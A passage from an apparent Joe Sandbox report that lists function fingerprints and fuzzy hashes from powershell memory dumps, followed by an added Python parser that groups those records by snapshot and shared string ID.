• Opcode Fuzzy Hash: 521139534d4eb577d4c2356167583758d96257f44e18dffaf7cc6af0e3698c8b
• Instruction Fuzzy Hash: 0741F59281E3E15FE703662868792C53F708E63558B0A41DBC8D1CF1A3E549694EC7B7

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
Similarity
• API ID:
• String ID: J2k$J2k$J2k$J2k
• API String ID: 0-2618344979
• Opcode ID: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
• Instruction ID: f1334499dd6ed6922bc3d53a1d216bb4ed69ac20105dee1725d0fbc4a69904bf
• Opcode Fuzzy Hash: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
• Instruction Fuzzy Hash: 31414BF0A0C366DFDB15AF1984007667BB8BF46718F0A80B7D4448F249C775C986DBA2

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
Similarity
• API ID:
• String ID: p$p$p$p
• API String ID: 0-3467077657
• Opcode ID: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
• Instruction ID: f256bfaada08deb75ed9c75edea08de5ecc57c0694f4b678fce6fd828a33d420
• Opcode Fuzzy Hash: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
• Instruction Fuzzy Hash: 07211A5280E3D15FE707A738A8762C57F618E53058B0A42DBC4E58F0A3E509595ECBBA
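The records above are flat per-function fingerprints (memory region, String ID, Opcode ID, fuzzy hashes) and are only useful once you can pivot on them: which functions share a String ID, how many functions were recovered from each dump region, and whether the Opcode ID and Opcode Fuzzy Hash ever diverge. The following parser is an added example, not Joe Sandbox code; it reads exactly this "Memory Dump Source" record layout. SAMPLE is three of the records above copied verbatim (leading whitespace dropped), and the decoding of the process ID from the leading hex field of the .sdmp name is an assumption that merely matches the "_10_" in the snapshot file names on this page.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and pivot on them.
Added example, not Joe Sandbox code; field names mirror the report's labels."""
import re
from collections import defaultdict

# Constructed sample input: three records from the report above, verbatim.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
Similarity
• API ID:
• String ID: p$p$p$p
• API String ID: 0-3467077657
• Opcode ID: 521139534d4eb577d4c2356167583758d96257f44e18dffaf7cc6af0e3698c8b
• Instruction ID: d8a5dae8d78332a416d92f2ff5eca0b16de7e24bb94fe5bded7cf78fd84236ba
• Opcode Fuzzy Hash: 521139534d4eb577d4c2356167583758d96257f44e18dffaf7cc6af0e3698c8b
• Instruction Fuzzy Hash: 0741F59281E3E15FE703662868792C53F708E63558B0A41DBC8D1CF1A3E549694EC7B7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1825512144.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7920000_powershell.jbxd
Similarity
• API ID:
• String ID: J2k$J2k$J2k$J2k
• API String ID: 0-2618344979
• Opcode ID: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
• Instruction ID: f1334499dd6ed6922bc3d53a1d216bb4ed69ac20105dee1725d0fbc4a69904bf
• Opcode Fuzzy Hash: 73fc636c45b1144e4b6aa9f7c1bf4b8d5769434fd6ad47585082be599240a6f8
• Instruction Fuzzy Hash: 31414BF0A0C366DFDB15AF1984007667BB8BF46718F0A80B7D4448F249C775C986DBA2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4a80000_powershell.jbxd
Similarity
• API ID:
• String ID: p$p$p$p
• API String ID: 0-3467077657
• Opcode ID: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
• Instruction ID: f256bfaada08deb75ed9c75edea08de5ecc57c0694f4b678fce6fd828a33d420
• Opcode Fuzzy Hash: 46063a1dc00d634f740c6fa55f39d74ba34f11d8e9251a90ef4af0722a346097
• Instruction Fuzzy Hash: 07211A5280E3D15FE707A738A8762C57F618E53058B0A42DBC4E58F0A3E509595ECBBA
"""

# A bulleted "Label: value" line; the value may be empty (e.g. "• API ID:").
FIELD = re.compile(r"^•\s*(.+?):\s*(.*)$")


def _norm(label):
    """'API String ID' -> 'api_string_id', 'based on PE' -> 'based_on_pe'."""
    return re.sub(r"[^a-z0-9]+", "_", label.strip().lower())


def _parse_source_file(value):
    """Split '…sdmp, Offset: 07920000, based on PE: false' into fields."""
    parts = [p.strip() for p in value.split(", ")]
    out = {"source_file": parts[0]}
    for part in parts[1:]:
        key, _, val = part.partition(": ")
        out[_norm(key)] = val
    out["based_on_pe"] = out.get("based_on_pe", "").lower() == "true"
    # Assumption: the dump name begins with the PID in hex (0000000A == 10),
    # which matches the "_10_" in the snapshot names on this page.
    out["pid"] = int(parts[0].split(".")[0], 16)
    return out


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record, in report order."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "Memory Dump Source":      # every record starts here
            current = {}
            records.append(current)
            continue
        m = FIELD.match(line)
        if current is None or not m:          # section labels, no record yet
            continue
        key, value = _norm(m.group(1)), m.group(2).strip()
        if key == "source_file":
            current.update(_parse_source_file(value))
        else:
            current[key] = value
    return records


def group_by(records, key):
    """Bucket records by one field, preserving report order within a bucket."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec.get(key)].append(rec)
    return dict(groups)


def shared_string_ids(records):
    """String IDs referenced by more than one function, with their Opcode IDs."""
    return {sid: [r["opcode_id"] for r in recs]
            for sid, recs in group_by(records, "string_id").items() if len(recs) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for snap, group in group_by(recs, "snapshot_file").items():
        print(f"{snap}: {len(group)} function(s)")
    for sid, ids in shared_string_ids(recs).items():
        print(f"String ID {sid!r} shared by {len(ids)} functions")
```

Run against the full report text instead of SAMPLE to see every dump region at once; in these records the Opcode ID and the Opcode Fuzzy Hash are identical, so deduplicating on either gives the same result, while the Instruction Fuzzy Hash is the field that differs between the two p$p$p$p functions.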